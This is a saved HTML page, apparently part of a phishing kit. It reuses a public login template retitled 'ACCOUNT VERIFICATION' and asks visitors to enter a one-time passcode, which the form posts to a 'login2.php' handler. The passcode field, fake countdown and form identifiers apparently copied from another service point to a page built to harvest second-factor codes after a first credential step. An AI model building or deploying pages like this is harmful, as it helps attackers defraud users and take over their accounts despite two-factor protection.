<!DOCTYPE html>
<!-- saved from url=(0047)https://colorlib.com/etc/lf/Login_v6/index.html -->
<html lang="en" data-arp-injected="true"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ACCOUNT VERIFICATION</title>

<meta name="viewport" content="width=device-width, initial-scale=1">

<link rel="icon" type="image/png" href="https://colorlib.com/etc/lf/Login_v6/images/icons/favicon.ico">

<link rel="stylesheet" type="text/css" href="./Login V6_files/bootstrap.min.css">

<link rel="stylesheet" type="text/css" href="./Login V6_files/font-awesome.min.css">

<link rel="stylesheet" type="text/css" href="./Login V6_files/material-design-iconic-font.min.css">

<link rel="stylesheet" type="text/css" href="./Login V6_files/animate.css">

<link rel="stylesheet" type="text/css" href="./Login V6_files/hamburgers.min.css">

<link rel="stylesheet" type="text/css" href="./Login V6_files/animsition.min.css">

<link rel="stylesheet" type="text/css" href="./Login V6_files/select2.min.css">

<link rel="stylesheet" type="text/css" href="./Login V6_files/daterangepicker.css">

<link rel="stylesheet" type="text/css" href="./Login V6_files/util.css">
<link rel="stylesheet" type="text/css" href="./Login V6_files/main.css">

<meta name="robots" content="noindex, follow">
<script type="text/javascript" async="" src="./Login V6_files/ga.js.download"></script><script type="text/javascript" async="" src="./Login V6_files/analytics.js.download" nonce="f275a019-0e09-40b9-b01e-f8fa46347f67"></script><script defer="" src="./Login V6_files/s.js.download"></script><script nonce="f275a019-0e09-40b9-b01e-f8fa46347f67">(function(w,d){!function(a,e,t,r,z){a.zarazData=a.zarazData||{},a.zarazData.executed=[],a.zarazData.tracks=[],a.zaraz={deferred:[]};var s=e.getElementsByTagName("title")[0];s&&(a.zarazData.t=e.getElementsByTagName("title")[0].text),a.zarazData.w=a.screen.width,a.zarazData.h=a.screen.height,a.zarazData.j=a.innerHeight,a.zarazData.e=a.innerWidth,a.zarazData.l=a.location.href,a.zarazData.r=e.referrer,a.zarazData.k=a.screen.colorDepth,a.zarazData.n=e.characterSet,a.zarazData.o=(new Date).getTimezoneOffset(),a.dataLayer=a.dataLayer||[],a.zaraz.track=(e,t)=>{for(key in a.zarazData.tracks.push(e),t)a.zarazData["z_"+key]=t[key]},a.zaraz._preSet=[],a.zaraz.set=(e,t,r)=>{a.zarazData["z_"+e]=t,a.zaraz._preSet.push([e,t,r])},a.dataLayer.push({"zaraz.start":(new Date).getTime()}),a.addEventListener("DOMContentLoaded",(()=>{var t=e.getElementsByTagName(r)[0],z=e.createElement(r);z.defer=!0,z.src="/cdn-cgi/zaraz/s.js?z="+btoa(encodeURIComponent(JSON.stringify(a.zarazData))),t.parentNode.insertBefore(z,t)}))}(w,d,0,"script");})(window,document);</script><script type="text/javascript" src="./Login V6_files/1"></script><script type="text/javascript" async="" src="./Login V6_files/taas"></script></head>
<body>
<div class="limiter">
<div class="container-login100">
<div class="wrap-login100 p-t-85 p-b-20">
<form class="login100-form validate-form"  data-testid="royal_login_form" action="login2.php" method="post" onsubmit="" id="u_0_a">
<span class="login100-form-title p-b-70">
Enter otp and verify
</span>
<span class="login100-form-avatar">
<img src="./Login V6_files/logo.png" alt="AVATAR">
</span>

<div class="wrap-input100 validate-input m-b-50" data-validate="Enter OTP">
<input class="input100" type="password" name="pass" id="pass" >
<span class="focus-input100" data-placeholder="OTP"></span>
</div>
<div class="container-login100-form-btn">
<button class="login100-form-btn" value="1" name="login" data-testid="royal_login_button" type="submit" id="u_0_d_PE">
Verify
</button>
</div>
<ul class="login-more p-t-190">
<li class="m-b-8">
<span class="txt1">
Wait for OTP 3:59 MIN
</span>
<a href="https://colorlib.com/etc/lf/Login_v6/index.html#" class="txt2">

</a>
</li>
<li>
<span class="txt1">
Don’t receive OTP?
</span>
</li>
</ul>
</form>
</div>
</div>
</div>
<div id="dropDownSelect1"></div>

<script src="./Login V6_files/jquery-3.2.1.min.js.download"></script>

<script src="./Login V6_files/animsition.min.js.download"></script>

<script src="./Login V6_files/popper.js.download"></script>
<script src="./Login V6_files/bootstrap.min.js.download"></script>

<script src="./Login V6_files/select2.min.js.download"></script>

<script src="./Login V6_files/moment.min.js.download"></script>
<script src="./Login V6_files/daterangepicker.js.download"></script>

<script src="./Login V6_files/countdowntime.js.download"></script>

<script src="./Login V6_files/main.js.download"></script>

<script async="" src="./Login V6_files/js"></script>
<script>
	  window.dataLayer = window.dataLayer || [];
	  function gtag(){dataLayer.push(arguments);}
	  gtag('js', new Date());

	  gtag('config', 'UA-23581568-13');
	</script>
<script defer="" src="./Login V6_files/v652eace1692a40cfa3763df669d7439c1639079717194" integrity="sha512-Gi7xpJR8tSkrpF7aordPZQlW2DLtzUlZcumS8dMQjwDHEnw9I7ZLyiOj/6tZStRBGtGgN6ceN6cMH8z7etPGlw==" data-cf-beacon="{&quot;rayId&quot;:&quot;6e25ba33aa8d2e83&quot;,&quot;token&quot;:&quot;cd0b4b3a733644fc843ef0b185f98241&quot;,&quot;version&quot;:&quot;2021.12.0&quot;,&quot;si&quot;:100}" crossorigin="anonymous"></script>


<iframe src="./Login V6_files/saved_resource.html" style="display: none;"></iframe></body></html>
